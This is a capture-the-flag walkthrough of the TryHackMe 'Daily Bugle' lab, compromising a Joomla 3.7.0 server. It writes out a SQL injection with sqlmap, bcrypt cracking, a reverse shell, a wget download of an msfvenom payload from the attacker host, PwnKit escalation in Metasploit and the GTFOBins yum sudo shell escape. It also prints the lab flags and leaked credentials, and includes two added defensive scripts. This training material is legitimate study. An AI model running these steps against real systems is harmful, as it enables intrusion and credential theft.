Daily Bugle [TryHackMe]
2023-09-03
Introduction
The first hard room of the "Offensive Pentesting" path, with a Spiderman theme. The goal of the room is to compromise the machine and obtain the user and root flags using a Joomla vulnerability and a privilege escalation exploit.
Task 1 - Deploy and compromise the vulnerable machine!
Step 1
- I start the machine and access the web application it hosts.
- I scan the machine with nmap in two passes: a fast full-port SYN scan, then a script and version scan limited to the open ports found.
sudo nmap -sS --min-rate 5000 -p- -Pn -v -oN nmap_inicial <IP>
ports=$(cat nmap_inicial | grep '^[0-9]' | cut -d '/' -f1 | xargs | tr ' ' ',')
sudo nmap -p$ports -sC -sV -Pn -oN nmap_final <IP>
- Ports 22 (OpenSSH 7.4), 80 (Apache httpd 2.4.6 (CentOS) PHP/5.6.40) and 3306 (MySQL/MariaDB).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open mysql MariaDB (unauthorized)
- I scan with dirb looking for directories on the site.
❯ dirb http://10.10.53.147/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Sep 3 09:14:53 2023
URL_BASE: http://10.10.53.147/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.53.147/ ----
==> DIRECTORY: http://10.10.53.147/administrator/
==> DIRECTORY: http://10.10.53.147/bin/
==> DIRECTORY: http://10.10.53.147/cache/
+ http://10.10.53.147/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://10.10.53.147/components/
==> DIRECTORY: http://10.10.53.147/images/
==> DIRECTORY: http://10.10.53.147/includes/
+ http://10.10.53.147/index.php (CODE:200|SIZE:9278)
==> DIRECTORY: http://10.10.53.147/language/
==> DIRECTORY: http://10.10.53.147/layouts/
==> DIRECTORY: http://10.10.53.147/libraries/
==> DIRECTORY: http://10.10.53.147/media/
==> DIRECTORY: http://10.10.53.147/modules/
==> DIRECTORY: http://10.10.53.147/plugins/
+ http://10.10.53.147/robots.txt (CODE:200|SIZE:836)
==> DIRECTORY: http://10.10.53.147/templates/
==> DIRECTORY: http://10.10.53.147/tmp/
---- Entering directory: http://10.10.53.147/administrator/ ----
==> DIRECTORY: http://10.10.53.147/administrator/cache/
==> DIRECTORY: http://10.10.53.147/administrator/components/
==> DIRECTORY: http://10.10.53.147/administrator/help/
==> DIRECTORY: http://10.10.53.147/administrator/includes/
+ http://10.10.53.147/administrator/index.php (CODE:200|SIZE:4843)
==> DIRECTORY: http://10.10.53.147/administrator/language/
==> DIRECTORY: http://10.10.53.147/administrator/logs/
==> DIRECTORY: http://10.10.53.147/administrator/modules/
==> DIRECTORY: http://10.10.53.147/administrator/templates/
---- Entering directory: http://10.10.53.147/bin/ ----
+ http://10.10.53.147/bin/index.html (CODE:200|SIZE:31)
---- Entering directory: http://10.10.53.147/cache/ ----
+ http://10.10.53.147/cache/index.html (CODE:200|SIZE:31)
^C> Testing: http://10.10.53.147/cache/lisence
Step 2
- I look for a Joomla scanner along the lines of wpscan. I find https://github.com/OWASP/joomscan and install it from the Kali repository. I confirm that the Joomla version is 3.7.0.
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.10.53.147/administrator/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://10.10.53.147/administrator/components
http://10.10.53.147/administrator/modules
http://10.10.53.147/administrator/templates
http://10.10.53.147/administrator/includes
http://10.10.53.147/administrator/language
http://10.10.53.147/administrator/templatesll
- I find several vulnerabilities for Joomla version 3.7.
❯ searchsploit joomla 3.7 -w
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Joomla! 3.7 - SQL Injection | https://www.exploit-db.com/exploits/44227
Joomla! 3.7.0 - 'com_fields' SQL Injection | https://www.exploit-db.com/exploits/42033
Joomla! Component ARI Quiz 3.7.4 - SQL Injection | https://www.exploit-db.com/exploits/46769
Joomla! Component com_realestatemanager 3.7 - SQL Injection | https://www.exploit-db.com/exploits/38445
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | https://www.exploit-db.com/exploits/43488
Joomla! Component J2Store < 3.3.7 - SQL Injection | https://www.exploit-db.com/exploits/46467
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection | https://www.exploit-db.com/exploits/44117
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | https://www.exploit-db.com/exploits/43913
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection | https://www.exploit-db.com/exploits/42589
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
- I find a candidate exploit at https://www.exploit-db.com/exploits/42033
Step 3
- I attack with SQLi using sqlmap.
sqlmap -u "http://10.10.53.147/administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
- Another option is the script at https://github.com/incredibleindishell/exploit-code-by-me/tree/43f3976ee02430762bbe02642dc8df82385b7cca/Joomla-SQL-Injection-3.7
- Looking for a third working option, I find the script https://github.com/stefanlucas/Exploit-Joomla
❯ python2 joomblah.py http://10.10.53.147
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user [u'811', u'Super User', u'jonah', u'jonah@tryhackme.com', u'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', u'', u'']
- Extracting sessions from fb9j5_session
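As an added defender-side example (not part of the original writeup, nor code from any of the tools above), the following Python script parses Apache combined-format access-log lines and flags requests to the com_fields view whose list[fullordering] value is not a plain `column [ASC|DESC]` ordering, which is the shape of the probe sent by the sqlmap command above. The log lines are constructed samples, not the lab machine's logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format (not from the lab machine).
# Line 3 mimics the sqlmap probe against list[fullordering]; parentheses and
# commas are percent-encoded as a scanner would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Sep/2023:09:14:53 +0000] "GET /index.php HTTP/1.1" 200 9278 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Sep/2023:09:15:01 +0000] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.id%20ASC HTTP/1.1" 200 4843 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Sep/2023:09:15:02 +0000] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%281%2C1%2C1%29 HTTP/1.1" 500 0 "-" "sqlmap/1.7"
10.0.0.7 - - [03/Sep/2023:09:16:10 +0000] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20DESC HTTP/1.1" 200 4843 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# A legitimate ordering value is an identifier optionally followed by ASC or DESC.
# Function calls, quotes or comments have no business in an ORDER BY parameter,
# so anything else is treated as an injection attempt (the same allow-list idea
# that fixes the bug server-side).
SAFE_ORDERING = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    url = urlsplit(entry['target'])
    entry['path'] = url.path
    entry['query'] = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    return entry


def suspicious_ordering(entry):
    """Return a reason string if the request abuses list[fullordering], else None."""
    q = entry['query']
    if entry['path'] != '/administrator/index.php' or q.get('option') != ['com_fields']:
        return None
    for value in q.get('list[fullordering]', []):
        if not SAFE_ORDERING.match(value):
            return f"unexpected list[fullordering] value: {value!r}"
    return None


def scan_log(text):
    """Return (ip, user-agent, reason) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = suspicious_ordering(entry)
        if reason:
            hits.append((entry['ip'], entry['ua'], reason))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags only the third line; the two ordinary sort requests pass the allow-list.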
- I use John the Ripper on the obtained hash. Password → spiderman123
❯ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:00:47 DONE (2023-09-03 10:50) 0.02120g/s 994.1p/s 994.1c/s 994.1C/s 060494..setsuna
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Step 4
- I try to upload a PHP file for a reverse shell, without success. Searching online I find https://www.hackingarticles.in/joomla-reverse-shell/, so I modify a PHP file to achieve it.
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.14.50.184] from (UNKNOWN) [10.10.53.147] 48678
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:14:22 up 2:06, 0 users, load average: 0.00, 0.03, 0.15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$
- I stabilize the shell.
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
- On my machine, I create a payload with msfvenom to download into /tmp on the remote machine.
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.x.x.x LPORT=4444
- On the target machine I run:
wget http://10.x.x.x:8080/shell
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shell'
100%[======================================>] 250 --.-K/s in 0s
2023-09-03 05:18:08 (954 KB/s) - 'shell' saved [250/250]
bash-4.2$ ls
ls
shell
bash-4.2$ chmod +x shell
chmod +x shell
bash-4.2$ ./shell
Step 5
- I open Metasploit and select the multi/handler exploit with the meterpreter/reverse_tcp payload.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.14.50.184:4444
[*] Sending stage (3045380 bytes) to 10.10.53.147
[*] Meterpreter session 1 opened (10.14.50.184:4444 -> 10.10.53.147:34128) at 2023-09-03 11:22:51 +0200
meterpreter >
- I load the local_exploit_suggester module and run it.
msf6 exploit(multi/handler) > search exploit suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux apache @ 10.10.53.147 10.14.50.184:4444 -> 10.10.53.147:34128 (10.10.53.147)
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.53.147 - Collecting local exploits for x64/linux...
[*] 10.10.53.147 - 186 exploit checks are being tried...
[+] 10.10.53.147 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.53.147 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 10.10.53.147 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.53.147 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 10.10.53.147 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.53.147 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[+] 10.10.53.147 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 10.10.53.147 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
4 exploit/linux/local/ptrace_traceme_pkexec_helper Yes The target appears to be vulnerable.
5 exploit/linux/local/su_login Yes The target appears to be vulnerable.
6 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
7 exploit/linux/local/sudoedit_bypass_priv_esc Yes The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine
- I use the exploit cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.tlhznymlpvc
[+] The target is vulnerable.
[*] Writing '/tmp/.adasqfiitd/zraeisswkke/zraeisswkke.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.adasqfiitd
[*] Sending stage (3045380 bytes) to 10.10.53.147
[+] Deleted /tmp/.adasqfiitd/zraeisswkke/zraeisswkke.so
[+] Deleted /tmp/.adasqfiitd/.dnnzjbsapkm
[+] Deleted /tmp/.adasqfiitd
[*] Meterpreter session 2 opened (10. -> 10.10.53.147:34132) at 2023-09-03 11:38:41 +0200
Step 6
- I get root access and look for the flags.
meterpreter > getuid
Server username: root
meterpreter > search -f user.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/home/jjameson/user.txt 33 2019-12-16 01:47:48 +0100
meterpreter > search -f root.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/root/root.txt 33 2019-12-16 01:47:19 +0100
meterpreter > cat /home/jjameson/user.txt
27a260fe3cba712cfdedb1c86d80442e
meterpreter > cat /root/root.txt
eec3d53292b1821868266858d7fa6f79
- The route the room proposed was to use the yum binary; for that, it was necessary to get access as the local user after reviewing the configuration.php file in /var/www/html.
meterpreter > cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
- After logging in with those credentials, one would look for the user flag and then check which binary the user can run:
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
- https://gtfobins.github.io/gtfobins/yum/ gives the following exploit:
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
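As an added example from the defender's side (not part of the original writeup and not GTFOBins code), this Python script parses `sudo -l` output like the one shown above and flags rules that hand out a root shell: a binary with a documented sudo shell escape, no argument restriction, NOPASSWD, or runas ALL. The sample output is constructed from the jjameson entry with an extra argument-restricted rule added for contrast; the GTFOBins set is a deliberately partial list.

```python
import re
from os.path import basename

# Constructed sample of `sudo -l` output, modelled on the jjameson entry in this
# writeup (not copied from the lab machine); the systemctl rule is added so the
# audit has a restricted rule to leave alone.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, env_reset, secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
"""

# Partial list of binaries with a documented "sudo" shell escape on GTFOBins
# (https://gtfobins.github.io/); extend it for your environment.
GTFOBINS_SUDO = {"yum", "rpm", "pip", "vi", "vim", "less", "more", "find",
                 "awk", "python", "perl", "env", "tar", "zip", "bash", "sh"}

# One rule line: "(runas) [TAG: ...] /path/to/cmd [args]"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)\s*(?P<args>.*)$')


def parse_sudo_l(text):
    """Return the command rules listed after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if re.match(r'^User \S+ may run the following commands', line):
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rule = m.groupdict()
            rule['tags'] = [t.rstrip(':') for t in rule['tags'].split()]
            rule['args'] = rule['args'].strip()
            rules.append(rule)
    return rules


def audit(rules):
    """Flag rules that let the caller reach a root shell; each finding lists why."""
    findings = []
    for r in rules:
        reasons, name = [], basename(r['cmd'])
        if name in GTFOBINS_SUDO:
            reasons.append(f"{name} has a documented sudo shell escape")
        if r['args'] == '':
            reasons.append("no argument restriction (caller chooses flags such as -c/--enableplugin)")
        if 'NOPASSWD' in r['tags']:
            reasons.append("NOPASSWD: no password prompt, so any foothold as this user suffices")
        if r['runas'].split(':')[0].strip() == 'ALL':
            reasons.append("may run as any user, root included")
        if name in GTFOBINS_SUDO or r['args'] == '':
            findings.append({'cmd': r['cmd'], 'reasons': reasons})
    return findings
```

The fix the audit points at is the usual one: restrict the rule to the exact yum invocation that is needed, and never allow an unrestricted package manager under sudo.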
Conclusion
A very fun room with a Spiderman theme, my favourite superhero. This time the room carried the hard tag, and honestly I noticed the small jump in level. It took me about 3 hours to complete it; I ran into several dead ends with the Joomla SQLi until I came across the Python script. To get the flags I used Metasploit's exploit suggester directly, instead of listing the binaries the local user could run (after reviewing the site configuration in /var/www/html) and leveraging the /bin/yum binary to obtain privileged access as the room suggests.